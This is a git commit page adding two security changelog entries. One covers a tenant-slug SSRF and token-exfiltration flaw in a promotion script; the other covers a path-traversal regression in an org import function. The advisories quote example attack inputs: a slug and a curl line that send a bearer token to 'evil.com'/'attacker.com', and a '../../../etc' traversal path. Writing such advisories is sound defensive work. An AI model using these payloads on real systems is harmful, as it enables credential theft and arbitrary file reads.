molecule-ai/docs
41
0
Fork 0
Code Issues Pull Requests 17 Actions Packages Projects Releases Wiki Activity

docs(security): add OFFSEC-006 + CWE-22 regression to Security Changelog
Secret scan / secret-scan (pull_request) Successful in 1m29s
Details
CI / build (pull_request) Successful in 3m24s
Details

Browse Source 
- OFFSEC-006 (2026-05-14): tenant slug SSRF + token exfiltration in
  promote-tenant-image.sh — RFC-1123 validation + set -f glob disable
- CWE-22 regression (2026-05-13): org_import.go path traversal —
  loadWorkspaceEnv replaces parseEnvFile

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
This commit is contained in:
Molecule AI · documentation-specialist
2026-05-14 04:19:32 +00:00
parent 5830875200
commit 3992150a47
1 changed files with 47 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
content/docs/security/changelog.md
+47
View File
@@ -9,6 +9,53 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
---
## 2026-05-14 — OFFSEC-006: Tenant Slug SSRF + Token Exfiltration in `promote-tenant-image.sh`
**Severity:** High (CWE-918 SSRF + CWE-20 Input Validation)
**PR:** [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pull/933)
**Affected:** `scripts/promote-tenant-image.sh` — tenant slug interpolation into URLs and ECR identifiers
### Vulnerability
Tenant slugs were interpolated directly into URL paths (`cp_redeploy_tenant`, `tenant_buildinfo`, `tenant_health`, `resolve_tenant_instance_id`) and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could be passed to `promote-tenant-image.sh`, causing:
1. **SSRF** — the slug injected as a URL authority or path segment, redirecting the platform's HTTP call to an attacker-controlled host.
2. **Token exfiltration**`curl ?url=https://evil.com&token=$CP_TOKEN` causes the platform's bearer token to appear in the attacker-controlled server's access logs.
Additionally, bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion, allowing a slug like `evil?url=https://attacker.com` to expand to a list of filenames before being passed to curl.
### Fix
Two-layer defence:
1. **`set -f`** (line 57): disables glob expansion before any slug is used, so `*`, `?`, and `[` are treated as literal characters.
2. **`validate_slug()`** (new function): RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) rejects any slug that does not match the tenant naming standard before any network call is issued. Invalid slugs exit with code 64.
### User-facing summary
Tenant promotion scripts now validate all tenant slug values against RFC-1123 before making any HTTP call or referencing the slug in an ECR identifier. Malformed slugs are rejected immediately with a descriptive error.
---
## 2026-05-13 — CWE-22: Path Traversal Regression in `org_import.go`
**Severity:** High (CWE-22)
**PR:** [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pull/810)
**Affected:** `org_import.go``createWorkspaceTree`
### Vulnerability
A regression removed the `resolveInsideRoot` path-traversal guard from `createWorkspaceTree`. A malicious org YAML with `filesDir: "../../../etc"` could read arbitrary server files through the org template import path.
### Fix
Replaced unprotected `parseEnvFile` calls with `loadWorkspaceEnv` which applies `resolveInsideRoot` validation before accessing any path.
### User-facing summary
Org template imports now correctly validate all file paths before accessing them. Attempts to traverse outside the workspace root are rejected.
---
## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
**Severity:** High (CWE-22)